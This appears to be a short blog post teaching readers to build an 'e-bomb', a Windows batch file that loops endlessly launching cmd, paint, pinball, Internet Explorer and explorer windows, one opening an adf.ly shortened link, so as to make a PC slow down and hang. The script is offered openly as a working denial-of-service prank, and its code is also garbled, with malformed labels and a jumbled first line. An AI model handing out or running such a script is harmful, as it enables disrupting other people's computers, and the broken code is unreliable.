LET'S START CREATING A SIMPLE E-BOMB
1. CLICK ON START-> RUN -> NOTEPAD.
2. COPY OR WRITE THE FOLLOWING CODE.
@echo off3. NOW SAVE THE NOTEPAD AS FILENAME.bat
msg * (YOUR MSG HERE)
cls
msg * (YOUR MSG HERE)
cls
msg * (YOUR MSG HERE)
cls
begin
goto %random%
:1
start cmd.exe
goto begin
:2
start paint.exe
goto begin
:3
start pinball.exe
goto begin :4
start iexplore.exe
goto begin
:5
start explorer.exe
goto begin
:6
start iexplore.exe "http://adf.ly/N7E5e"
goto begin
4. NOW DARE TO OPEN THE FILENAME.bat
NOTE :THIS FILENAME.bat MAKES YOUR PC SLOW BECAUSE THE ABOVE PROGRAM CODE IS TO OPEN MULTIPLE PROCESS AT AT TIME SO THAT IT MAKE YOUR PC HANG.
Comments
Post a Comment